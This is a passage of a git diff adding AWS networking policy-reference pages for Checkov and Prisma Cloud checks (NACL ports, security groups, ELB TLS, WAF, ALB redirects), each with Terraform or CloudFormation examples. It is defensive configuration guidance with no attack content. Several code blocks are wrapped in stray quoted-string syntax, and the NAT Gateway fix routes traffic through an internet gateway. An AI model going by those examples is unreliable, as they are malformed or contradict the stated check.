https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py[CKV_AWS_213] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By ensuring that your AWS ELB policy only uses secure protocols, you can help prevent attackers from intercepting and reading sensitive information that is transmitted between your ELB and its clients. +This can help protect your network and data from various types of attacks, including man-in-the-middle attacks, eavesdropping, and other types of data interception. 
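+Conversely, a policy that still enables a deprecated protocol version would be flagged; the following is a minimal sketch (load balancer and policy names are illustrative):
+
+[source,go]
+----
+resource "aws_load_balancer_policy" "fail" {
+  load_balancer_name = aws_elb.example.name
+  policy_name        = "legacy-ssl"
+  policy_type_name   = "SSLNegotiationPolicyType"
+
+  policy_attribute {
+    # SSLv3 is considered insecure and should not be enabled
+    name  = "Protocol-SSLv3"
+    value = "true"
+  }
+}
+----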
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_load_balancer_policy" "pass" { + load_balancer_name = aws_elb.wu-tang.name + policy_name = "wu-tang-ssl" + policy_type_name = "SSLNegotiationPolicyType" + + policy_attribute { + name = "Protocol-TLSv1.2" + value = "true" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc new file mode 100644 index 000000000..779293766 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 20 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a4a20fce-f0a1-4d0a-abee-3330c572f77c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py[CKV_AWS_230] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 20. +Removing unfettered connectivity to remote console services, such as FTP, reduces a server's exposure to risk. 
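+If FTP data transfer is not needed at all, the ingress can also be denied explicitly rather than narrowed to a trusted CIDR; the following is a sketch that reuses the example NACL from the fix below:
+
+[source,go]
+----
+resource "aws_network_acl_rule" "deny_ftp_data" {
+  network_acl_id = aws_network_acl.example.id
+  rule_number    = 210
+  egress         = false
+  protocol       = "tcp"
+  rule_action    = "deny"
+  cidr_block     = "0.0.0.0/0"
+  from_port      = 20
+  to_port        = 20
+}
+----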
+ +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 20 + To: 20", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 20 + to_port = 20 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc new file mode 100644 index 000000000..6e88004fb --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 21 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6aee688e-e769-41f9-aed0-cb2ae972c31c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py[CKV_AWS_229] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 21. +Removing unfettered connectivity to remote console services, such as FTP, reduces a server's exposure to risk. 
+ +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 21 + To: 21", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 21 + to_port = 21 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc new file mode 100644 index 000000000..241a810bd --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 22 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a38287d8-f7b2-4d14-a06f-f4ef2467f472 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py[CKV_AWS_232] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 22. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. 
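+In practice, SSH ingress is usually limited to a known administrative network such as a bastion subnet; the following is a sketch (the 192.0.2.0/24 range is a documentation placeholder - substitute your own admin CIDR):
+
+[source,go]
+----
+resource "aws_network_acl_rule" "ssh_from_admin" {
+  network_acl_id = aws_network_acl.example.id
+  rule_number    = 200
+  egress         = false
+  protocol       = "tcp"
+  rule_action    = "allow"
+  cidr_block     = "192.0.2.0/24" # admin/bastion network only
+  from_port      = 22
+  to_port        = 22
+}
+----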
+ +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 22 + To: 22", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 22 + to_port = 22 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc new file mode 100644 index 000000000..3c5509c16 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 3389 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 207dd5fe-304c-4ee5-b238-3becd4f395c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py[CKV_AWS_231] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 3389. +Removing unfettered connectivity to remote console services, such as RDP, reduces a server's exposure to risk. 
+ +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 3389 + To: 3389", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 3389 + to_port = 3389 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc new file mode 100644 index 000000000..e10044ffe --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc @@ -0,0 +1,64 @@ +== AWS NAT Gateways are not utilized for the default route + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 954e9b67-ef6b-4bd4-9a6b-8fee29635057 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml[CKV2_AWS_35] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Using Amazon NAT Gateways (AWS NAT Gateways) for the default route can help improve the security and performance of your network. +NAT Gateways allow you to route traffic from your Amazon Virtual Private Cloud (Amazon VPC) to the Internet, while also hiding the IP addresses of your instances from the Internet. 
+This can help protect your instances from potential threats such as spoofing attacks and port scans. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_vpc" "example" { + cidr_block = "10.0.0.0/16" +} + + +resource "aws_internet_gateway" "example" { + vpc_id = aws_vpc.example.id +} + + +resource "aws_route_table" "aws_route_table_ok_1" { + vpc_id = aws_vpc.example.id + + route { + cidr_block = "0.0.0.0/0" + gateway_id = aws_internet_gateway.example.id + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined.adoc new file mode 100644 index 000000000..91490763d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined.adoc @@ -0,0 +1,54 @@ +== AWS RDS security groups are not defined + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 39e0a984-0fea-485f-96f3-b43d23f7c9c9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py[CKV_AWS_198] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By ensuring that AWS RDS security groups are defined, you can help protect your instances from unauthorized access and ensure that only authorized traffic is allowed to reach your instances. +This can help prevent data breaches and other security incidents, and can also help ensure that your instances are not overwhelmed by unwanted traffic. 
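+For VPC-based RDS deployments, the equivalent control is typically a dedicated VPC security group attached to the instance itself; the following is a minimal sketch (identifiers and the password variable are illustrative):
+
+[source,go]
+----
+resource "aws_db_instance" "example" {
+  identifier        = "example-db"
+  engine            = "mysql"
+  instance_class    = "db.t3.micro"
+  allocated_storage = 20
+  username          = "admin"
+  password          = var.db_password
+
+  # Attach a purpose-built security group instead of relying on the default one
+  vpc_security_group_ids = [aws_security_group.db.id]
+}
+----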
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_db_security_group" "exists" { + name = "rds_sg" + + ingress { + cidr = "10.0.0.0/24" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc new file mode 100644 index 000000000..fd864002e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc @@ -0,0 +1,54 @@ +== AWS route table with VPC peering overly permissive to all traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8d403b9b-794b-4516-84fa-e9415155fb27 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml[CKV2_AWS_44 ] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies VPC route tables with VPC peering connection which are overly permissive to all traffic. +Being highly selective in peering routing tables is a very effective way of minimizing the impact of breach as resources outside of these routes are inaccessible to the peered VPC. 
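+A route that this policy would flag sends all traffic through the peering connection; the following is a sketch with illustrative IDs:
+
+[source,go]
+----
+resource "aws_route" "fail_example" {
+  route_table_id            = "rtb-4fbb3ac4"
+  # 0.0.0.0/0 routes all traffic to the peer instead of a selective CIDR
+  destination_cidr_block    = "0.0.0.0/0"
+  vpc_peering_connection_id = "pcx-45ff3dc1"
+}
+----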
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_route" "aws_route_pass_1" { + route_table_id = "rtb-4fbb3ac4" + destination_cidr_block = "10.0.1.0/22" + vpc_peering_connection_id = "pcx-45ff3dc1" +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc new file mode 100644 index 000000000..fbd30b5ec --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc @@ -0,0 +1,72 @@ +== AWS Security Group allows all traffic on all ports + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10b368a7-3def-41cb-9114-39354b7674ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py[CKV_AWS_277] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By allowing all ingress traffic on all ports, AWS security group permits unrestricted internet access. 
+Make sure that security group rules define specific ports and trusted source ranges, so that only the traffic your application actually needs is permitted.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_security_group" "pass" {
+  name   = "example"
+  vpc_id = aws_vpc.example.id
+
+  ingress {
+    cidr_blocks = ["0.0.0.0/0"]
+    from_port   = 80
+    to_port     = 80
+    protocol    = "tcp"
+  }
+
+  ingress {
+    cidr_blocks = ["0.0.0.0/0"]
+    from_port   = 443
+    to_port     = 443
+    protocol    = "tcp"
+  }
+
+  egress {
+    cidr_blocks = ["0.0.0.0/0"]
+    from_port   = 0
+    to_port     = 0
+    protocol    = "-1"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc
new file mode 100644
index 000000000..8b3f7cabf
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc
@@ -0,0 +1,69 @@
+== AWS security groups allow ingress from 0.0.0.0/0 to port 80
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f4d22869-f19a-4a8c-86c8-eaeb0d9e1056
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py[CKV_AWS_260]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,CloudFormation
+
+|===
+
+
+
+=== Description
+
+
+Allowing ingress from 0.0.0.0/0 to port 80 (the HTTP port) can expose your Amazon Web Services (AWS) resources to potential security threats.
+This is because 0.0.0.0/0 represents all IP addresses, and allowing traffic from all IP addresses to port 80 can make it easier for attackers to access your resources.
+By ensuring that your AWS security groups do not allow ingress from 0.0.0.0/0 to port 80, you can help protect your resources from potential attacks and unauthorized access.
+Instead, you should specify the IP addresses or ranges of IP addresses that are allowed to access your resources, and only allow traffic from those sources.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_security_group" "bar-sg" {
+  name   = "sg-bar"
+  vpc_id = aws_vpc.main.id
+
+  ingress {
+    from_port       = 80
+    to_port         = 80
+    protocol        = "tcp"
+    security_groups = [aws_security_group.foo-sg.id]
+    description     = "foo"
+  }
+
+  egress {
+    from_port   = 0
+    to_port     = 0
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned.adoc
new file mode 100644
index 000000000..5dc3faa23
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned.adoc
@@ -0,0 +1,55 @@
+== Default VPC is planned to be provisioned
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 85866910-4a92-4a99-b71c-fd309a49b3de
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py[CKV_AWS_148]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+A default VPC is created automatically for each AWS account.
+It includes a default security group and a default network access control list (NACL).
+Default VPCs have some limitations that might not be suitable for all use cases.
+Therefore, if you have specific requirements for your VPC, such as custom IP address ranges, support for PrivateLink or Transit Gateway, or the ability to delete the VPC, it might be more appropriate to create a custom VPC instead of using the default VPC. + +=== Fix - Buildtime + + +*Terraform* + + +It is recommended for this resource to not be configured + + +[source,go] +---- +{ + " resource "aws_default_vpc" "default" { + tags = { + Name = "Default VPC" + } + + }", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf.adoc new file mode 100644 index 000000000..820d99a79 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf.adoc @@ -0,0 +1,70 @@ +== Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fa2c54f0-629e-4913-8adf-c81092250789 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml[CKV2_AWS_29] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS WAF is a web application firewall service that helps protect your web applications and APIs from common web exploits that could affect your application's availability, integrity, or confidentiality. +By attaching AWS WAF to your public API gateway, you can create rules that block or allow traffic based on the characteristics of the traffic, such as the IP address, the HTTP method, or the values of specific headers. 
+This can help to protect your API from common web exploits such as SQL injection attacks, cross-site scripting attacks, and other types of malicious traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_api_gateway_rest_api" "edge" { + name = var.name + + policy = "" + + endpoint_configuration { + types = ["EDGE"] + } + +} + +resource "aws_api_gateway_stage" "wafv2_edge" { + deployment_id = aws_api_gateway_deployment.example.id + rest_api_id = aws_api_gateway_rest_api.edge.id + stage_name = "example" +} + + +resource "aws_wafv2_web_acl_association" "edge" { + resource_arn = aws_api_gateway_stage.wafv2_edge.arn + web_acl_id = aws_wafv2_web_acl.foo.id +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf.adoc new file mode 100644 index 000000000..332e0e2a6 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf.adoc @@ -0,0 +1,59 @@ +== AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7759063b-44f6-41ab-92fa-950f85f4a357 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml[CKV2_AWS_28] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS WAF is a web application firewall service that helps protect your web applications from common web exploits that could affect your application's availability, integrity, or confidentiality. 
+By attaching AWS WAF to your public-facing ALBs, you can create rules that block or allow traffic based on the characteristics of the traffic, such as the IP address, the HTTP method, or the values of specific headers. +This can help to protect your application from common web exploits such as SQL injection attacks, cross-site scripting attacks, and other types of malicious traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_lb" "lb_good_1" { + internal= false +} + + + +resource "aws_wafregional_web_acl_association" "foo" { + resource_arn = aws_lb.lb_good_1.arn + web_acl_id = aws_wafregional_web_acl.foo.id +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc new file mode 100644 index 000000000..4cb1e15f3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc @@ -0,0 +1,67 @@ +== Redshift is deployed outside of a VPC + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9a75182d-ed78-4827-b94d-bdb8af35b5b7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py[CKV_AWS_154] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +A VPC is a virtual network in the AWS cloud that is isolated from other virtual networks. +When you deploy Redshift in a VPC, you can control the inbound and outbound network traffic to and from your Redshift cluster using security groups and network access control lists (NACLs). 
+This can help to improve the security of your Redshift cluster and protect it from unauthorized access or attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* cluster_subnet_group_name + + +[source,go] +---- +resource "aws_redshift_cluster" "pass" { + ... ++ cluster_subnet_group_name="subnet-ebd9cead" +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::Cluster +* *Arguments:* Properties.ClusterSubnetGroupName + + +[source,yaml] +---- +Type: "AWS::Redshift::Cluster" + Properties: + ... ++ ClusterSubnetGroupName: "subnet-ebd9cead" +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers.adoc new file mode 100644 index 000000000..4cf25e0b7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers.adoc @@ -0,0 +1,56 @@ +== ALB does not drop HTTP headers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5dd236e7-f0da-4a06-825d-7691cdbf10be + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py[CKV_AWS_131] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Ensure that Drop Invalid Header Fields feature is enabled for your Amazon Application Load Balancers (ALBs) in order to follow security best practices and meet compliance requirements. +If Drop Invalid Header Fields security feature is enabled, HTTP headers with header fields that are not valid are removed by the Application Load Balancer instead of being routed to the associated targets. 
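+For contrast, a minimal non-compliant sketch (hypothetical resource names) either omits the attribute or sets it to false:
+
+[source,go]
+----
+# Non-compliant sketch: invalid HTTP header fields are forwarded to the
+# targets instead of being dropped by the load balancer.
+resource "aws_alb" "test_fail" {
+  name     = "test-lb-tf"
+  internal = false
+
+  drop_invalid_header_fields = false
+}
+----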
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_alb
+* *Arguments:* drop_invalid_header_fields
+
+
+[source,go]
+----
+resource "aws_alb" "test_success" {
+  name               = "test-lb-tf"
+  internal           = false
+  load_balancer_type = "network"
+  subnets            = aws_subnet.public.*.id
+
+  drop_invalid_header_fields = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones.adoc
new file mode 100644
index 000000000..797174771
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones.adoc
@@ -0,0 +1,73 @@
+== ALB does not redirect HTTP requests into HTTPS ones
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b7139473-a345-43f5-be2d-6d21681b359b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml[CKV2_AWS_20]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Ensure that the load balancer redirects all HTTP traffic to the encrypted HTTPS endpoint, rather than serving requests over plain HTTP or failing to respond.
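+For contrast, a listener that simply forwards plain HTTP on port 80 without a redirect is what this check flags (a sketch with hypothetical names):
+
+[source,go]
+----
+# Non-compliant sketch: port 80 traffic is forwarded as plain HTTP
+# instead of being redirected to HTTPS on port 443.
+resource "aws_lb_listener" "listener_bad" {
+  load_balancer_arn = aws_lb.lb_bad.arn
+  port              = "80"
+  protocol          = "HTTP"
+
+  default_action {
+    type             = "forward"
+    target_group_arn = aws_lb_target_group.example.arn
+  }
+}
+----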
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb, aws_lb_listener +* *Arguments:* _redirect_ of aws_lb_listener + + +[source,go] +---- +{ + " +resource "aws_lb" "lb_good" { +} + + + +resource "aws_lb_listener" "listener_good" { + load_balancer_arn = aws_lb.lb_good.arn + port = "80" + protocol = "HTTP" + + default_action { + type = "redirect" + + redirect { + port = "443" + protocol = "HTTPS" + status_code = "HTTP_301" + } + + + } + +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc new file mode 100644 index 000000000..338f233f2 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc @@ -0,0 +1,68 @@ +== Not all EIP addresses allocated to a VPC are attached to EC2 instances + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ac9f9609-d368-408a-93ba-1da69fe36380 + +|Checkov Check ID +| 